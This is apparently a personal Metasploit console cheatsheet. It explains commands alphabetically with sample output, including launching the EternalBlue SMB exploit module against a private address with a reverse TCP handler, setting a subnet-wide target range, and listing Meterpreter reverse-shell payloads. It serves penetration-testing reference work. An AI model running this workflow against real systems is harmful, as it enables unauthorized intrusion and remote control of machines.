Metasploit Console: my own cheatsheet
Metasploit Framework is a priceless open-source a tool for developing and executing exploit code against a remote target machine.
Its main admin interface, the Metasploit console has many different command options to chose from.
Here my own set (in alphabetical order) of main metasploit commands with a brief reference.
back
Once you have finished working with a particular module use the back command to move out of the current context.
msf exploit(multi/http/struts2_content_type_ognl) > back msf >
check
(Not supported by all exploit) check option that will check to see if a target is vulnerable.
msf exploit(multi/http/struts2_content_type_ognl) > check [*] www.xxxxxx.org:8080 The target is not exploitable.
color
Enable or disable color output of msfconsole.
msf > color Usage: color >'true'|'false'|'auto'> Enable or disable color output.
connect
Netcat-like command built into the msfconsole.
msf > connect 192.168.1.1 80 [*] Connected to 192.168.1.1:80 HTTP/1.0 400 Bad Request Content-Type: text/html X-Frame-Options: SAMEORIGIN Date: Tue, 05 Dec 2017 14:12:13 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Accept-Ranges: bytes Connection: close <html> <head> <title>400 Bad Request</title> </head> <body bgcolor="#ffffff"> <h2>400 Bad Request</h2> <p></p> </body> </html> msf >
edit
Edit the current module in Vim.
msf exploit(windows/smb/ms17_010_eternalblue) > edit [!] LocalEditor or $VISUAL/$EDITOR should be set. Falling back on vim. [*] Launching vim /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb
exit
Exit msfconsole.
msf exploit(windows/smb/ms17_010_eternalblue) > exit andrea@lucille:~$
exploit (run)
Starts the current exploit.
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.1 RHOST => 192.168.1.1 msf exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.1.6:4444 [*] 192.168.1.1:445 - Connecting to target for exploitation.
grep
Command is similar to Linux grep. It matches a given pattern from the output of another msfconsole command.
msf > grep
Usage: grep [options] pattern cmd
Grep the results of a console command (similar to Linux grep command)
OPTIONS:
-A <opt> Show arg lines of output After a match.
-B <opt> Show arg lines of output Before a match.
-c Only print a count of matching lines.
-h Help banner.
-i Ignore case.
-k <opt> Keep (include) arg lines at start of output.
-m <opt> Stop after arg matches.
-s <opt> Skip arg lines of output before attempting match.
-v Invert match.
help
Returns a list and small description of all available commands.
msf > help
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
info
Provides detailed information about a particular module including all options, targets, and other information.
msf > info exploit/windows/smb/ms17_010_eternalblue
Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Module: exploit/windows/smb/ms17_010_eternalblue
Platform: Windows
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Average
Disclosed: 2017-03-14
Provided by:
Sean Dillon <sean.dillon@risksense.com>
Dylan Davis <dylan.davis@risksense.com>
Equation Group
Shadow Brokers
thelightcosine
Available targets:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
Basic options:
...
irb
Opens a live ruby interpreter shell.
msf > irb [*] Starting IRB shell... >> puts "Test!" Test!
jobs
Provides the ability to list and terminate background jobs.
msf > jobs -h
Usage: jobs [options]
Active job manipulation and interaction.
OPTIONS:
-K Terminate all running jobs.
-h Help banner.
-i <opt> Lists detailed information about a running job.
-k <opt> Terminate the specified job name.
-l List all running jobs.
-v Print more detailed info. Use with -i and -l
msf >
kill
Kill any running jobs.
msf exploit(windows/smb/ms17_010_eternalblue) > kill 0 Stopping job: 0...
load
Loads a plugin from Metasploit’s plugin directory.
msf > load Usage: load [var=val var=val ...] Loads a plugin from the supplied path. For a list of built-in plugins, do: load -l The optional var=val options are custom parameters that can be passed to plugins.
loadpath
Load a third-part module tree.
msf > loadpath /home/andrea/modules Loaded 0 modules.
unload
Unloads a previously loaded plugin and removes any extended commands.
msf > unload pcap_log Unloading plugin pcap_log...unloaded.
resource
Runs resource files that can be loaded through msfconsole.
msf > resource Usage: resource path1 [path2 ...] Run the commands stored in the supplied files. Resource files may also contain ruby code between tags. See also: makerc
search
Regular-expression based search functionality (naming convention for Metasploit modules uses underscores versus hyphens).
msf > search struts Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/multi/http/struts2_content_type_ognl 2017-03-07 excellent Apache Struts Jakarta Multipart Parser OGNL Injection exploit/multi/http/struts2_rest_xstream 2017-09-05 excellent Apache Struts 2 REST Plugin XStream RCE exploit/multi/http/struts_code_exec 2010-07-13 good Apache Struts Remote Command Execution exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual Apache Struts ClassLoader Manipulation Remote Code Execution exploit/multi/http/struts_code_exec_exception_delegator 2012-01-06 excellent Apache Struts Remote Command Execution
Searches can be refined by using a built-in keyword system:
msf > help search Usage: search [keywords] Keywords: app : Modules that are client or server attacks author : Modules written by this author bid : Modules with a matching Bugtraq ID cve : Modules with a matching CVE ID edb : Modules with a matching Exploit-DB ID name : Modules with a matching descriptive name platform : Modules affecting this platform ref : Modules with a matching ref type : Modules of a specific type (exploit, auxiliary, or post) Examples: search cve:2009 type:exploit app:client
name
Search using a descriptive name.
msf > search name:struts Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/multi/http/struts2_content_type_ognl 2017-03-07 excellent Apache Struts Jakarta Multipart Parser OGNL Injection exploit/multi/http/struts2_rest_xstream 2017-09-05 excellent Apache Struts 2 REST Plugin XStream RCE exploit/multi/http/struts_code_exec 2010-07-13 good Apache Struts Remote Command Execution exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual Apache Struts ClassLoader Manipulation Remote Code Execution exploit/multi/http/struts_code_exec_exception_delegator 2012-01-06 excellent Apache Struts Remote Command Execution
platform
Search to modules that affect a specific platform.
msf > search platform:android Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/android/browser/samsung_knox_smdm_url 2014-11-12 excellent Samsung Galaxy KNOX Android Browser RCE exploit/android/browser/stagefright_mp4_tx3g_64bit 2015-08-13 normal Android Stagefright MP4 tx3g Integer Overflow exploit/android/browser/webview_addjavascriptinterface 2012-12-21 excellent Android Browser and WebView addJavascriptInterface Code Execution exploit/android/fileformat/adobe_reader_pdf_js_interface 2014-04-13 good Adobe Reader for Android addJavascriptInterface Exploit exploit/android/local/futex_requeue 2014-05-03 excellent Android 'Towelroot' Futex Requeue Kernel Exploit exploit/android/local/put_user_vroot 2013-09-06 excellent Android get_user/put_user Exploit exploit/multi/handler manual Generic Payload Handler exploit/multi/local/allwinner_backdoor 2016-04-30 excellent Allwinner 3.4 Legacy Kernel Local Privilege Escalation payload/android/meterpreter/reverse_http normal Android Meterpreter, Android Reverse HTTP Stager payload/android/meterpreter/reverse_https normal Android Meterpreter, Android Reverse HTTPS Stager payload/android/meterpreter/reverse_tcp normal Android Meterpreter, Android Reverse TCP Stager payload/android/meterpreter_reverse_http normal Android Meterpreter Shell, Reverse HTTP Inline payload/android/meterpreter_reverse_https normal Android Meterpreter Shell, Reverse HTTPS Inline payload/android/meterpreter_reverse_tcp normal Android Meterpreter Shell, Reverse TCP Inline
Search for modules by a specific author.
msf > search author:rapid7 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/atg/atg_client normal Veeder-Root Automatic Tank Gauge (ATG) Administrative Client auxiliary/admin/cisco/cisco_asa_extrabacon normal Cisco ASA Authentication Bypass (EXTRABACON) auxiliary/admin/dns/dyn_dns_update normal DNS Server Dynamic Update Record Injection auxiliary/admin/http/allegro_rompager_auth_bypass 2014-12-17 normal Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass auxiliary/admin/upnp/soap_portmapping normal UPnP IGD SOAP Port Mapping Utility auxiliary/dos/http/slowloris 2009-06-17 normal Slowloris Denial of Service Attack auxiliary/dos/misc/ibm_tsm_dos 2015-12-15 normal IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service
Keywords can also be combined further narrow down the returned results:
msf > search type:exploit name:struts cve:2017 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/multi/http/struts2_content_type_ognl 2017-03-07 excellent Apache Struts Jakarta Multipart Parser OGNL Injection exploit/multi/http/struts2_rest_xstream 2017-09-05 excellent Apache Struts 2 REST Plugin XStream RCE
sessions
Allows to list, interact with, and kill spawned sessions.
msf > sessions -h
Usage: sessions [options] or sessions [id]
Active session manipulation and interaction.
OPTIONS:
-C <opt> Run a Meterpreter Command on the session given with -i, or all
-K Terminate all sessions
-c <opt> Run a command on the session given with -i, or all
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate sessions by session ID and/or range
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s <opt> Run a script on the session given with -i, or all
-t <opt> Set a response timeout (default: 15)
-u <opt> Upgrade a shell to a meterpreter session on many platforms
-v List sessions in verbose mode
-x Show extended information in the session table
Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
set
Set framework options and parameters for the current module.
msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.1 RHOST => 192.168.1.1 msf exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST 192.168.1.1 yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target. Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
unset
Removes a parameter previously configured with set. (unset all removes all assigned variables)
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.1 RHOST => 192.168.1.1 msf exploit(windows/smb/ms17_010_eternalblue) > unset rhost Unsetting rhost...
setg
Set a global variables within msfconsole. The current environment can be saved with save command.
msf > setg LHOST 192.168.1.6 LHOST => 192.168.1.6 msf > setg RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24 msf > save Saved configuration to: /home/andrea/.msf4/config
show
Shows every module within Metasploit.
msf > show
Encoders
========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
auxiliary
Display a list of all of the available auxiliary modules.
msf > show auxiliary Auxiliary ========= Name Disclosure Date Rank Description ---- --------------- ---- ----------- admin/2wire/xslt_password_reset 2007-08-15 normal 2Wire Cross-Site Request Forgery Password Reset Vulnerability admin/backupexec/dump normal Veritas Backup Exec Windows Remote File Access admin/backupexec/registry normal Veritas Backup Exec Server Registry Access
exploits
Returns a list of all exploits contained in the framework.
msf > show exploits Exploits ======== Name Disclosure Date Rank Description ---- --------------- ---- ----------- aix/rpc_cmsd_opcode21 2009-10-07 great AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow aix/rpc_ttdbserverd_realpath 2009-06-17 great ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) bsdi/softcart/mercantec_softcart 2004-08-19 great Mercantec SoftCart CGI Overflow
payloads
show payloads will display all of the different payloads available.
msf > show payloads Payloads ======== Name Disclosure Date Rank Description ---- --------------- ---- ----------- aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline aix/ppc/shell_interact normal AIX execve shell for inetd
In the context of a particular exploit, show payloads will only display the payloads that are compatible with that particular exploit.
msf exploit(windows/smb/ms17_010_eternalblue) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- generic/custom normal Custom Payload generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline windows/x64/exec normal Windows x64 Execute Command windows/x64/loadlibrary normal Windows x64 LoadLibrary Path windows/x64/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager windows/x64/meterpreter/bind_ipv6_tcp_uuid normal Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
targets
Within the context of an exploit module show targets returns which targets are supported.
msf exploit(windows/smb/ms17_010_eternalblue) > show targets Exploit targets: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
advanced
Display more advanced options.
msf exploit(windows/smb/ms17_010_eternalblue) > show advanced Module advanced options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address CPORT no The local client port ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection ContextInformationFile no The information file that contains context information DisablePayloadHandler false no Disable the handler code for the selected payload EnableContextEncoding false no Use transient context when encoding payloads Proxies no A proxy chain of format type:host:port[,type:host:port][...] SSL false no Negotiate SSL/TLS for outgoing connections SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH" SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER) SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL3, TLS1, TLS1.1, TLS1.2, SSL23) VERBOSE false no Enable detailed status messages WORKSPACE no Specify the workspace for this module WfsDelay 0 no Additional delay when waiting for a session
encoders
Display a listing of the encoders that are available within MSF.
msf > show encoders
Compatible Encoders
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
nops
Display the available NOP Generators.
msf > show nops NOP Generators ============== Name Disclosure Date Rank Description ---- --------------- ---- ----------- armle/simple normal Simple mipsbe/better normal Better php/generic normal PHP Nop Generator ppc/simple normal Simple sparc/random normal SPARC NOP Generator tty/generic normal TTY Nop Generator x64/simple normal Simple x86/opty2 normal Opty2 x86/single_byte normal Single Byte
use
Select a module.
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > show info
Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Module: exploit/windows/smb/ms17_010_eternalblue
Platform: Windows
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Average
Disclosed: 2017-03-14
Provided by:
Sean Dillon <sean.dillon@risksense.com>
Dylan Davis <dylan.davis@risksense.com>
Equation Group
Shadow Brokers
thelightcosine
References
- https://github.com/rapid7/metasploit-framework
- https://github.com/rapid7/metasploit-framework/wiki
- https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf